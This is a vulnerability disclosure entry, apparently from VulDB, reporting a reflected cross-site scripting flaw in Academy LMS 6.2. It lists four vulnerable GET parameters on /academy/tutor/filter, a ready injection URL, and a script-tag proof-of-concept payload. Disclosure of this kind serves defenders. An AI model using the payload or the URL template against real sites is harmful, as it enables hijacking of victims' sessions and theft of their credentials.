| 제목 | Academy LMS 6.2 - Reflected XSS |
|---|
| 설명 | # Exploit Title: Academy LMS 6.2 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /academy/tutor/filter
GET parameter 'searched_word' is vulnerable to XSS
GET parameter 'searched_tution_class_type[]' is vulnerable to XSS
GET parameter 'searched_price_type[]' is vulnerable to XSS
GET parameter 'searched_duration[]' is vulnerable to XSS
https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]
XSS Payload:
acoa5"><script>alert(1)</script>dyzs0
[-] Done |
|---|
| 사용자 | skalvin (UID 49463) |
|---|
| 제출 | 2023. 08. 28. PM 11:28 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 09. 14. PM 09:44 (17 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 239749 [Academy LMS 6.2 켜짐 Windows GET Parameter /academy/tutor/filter 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|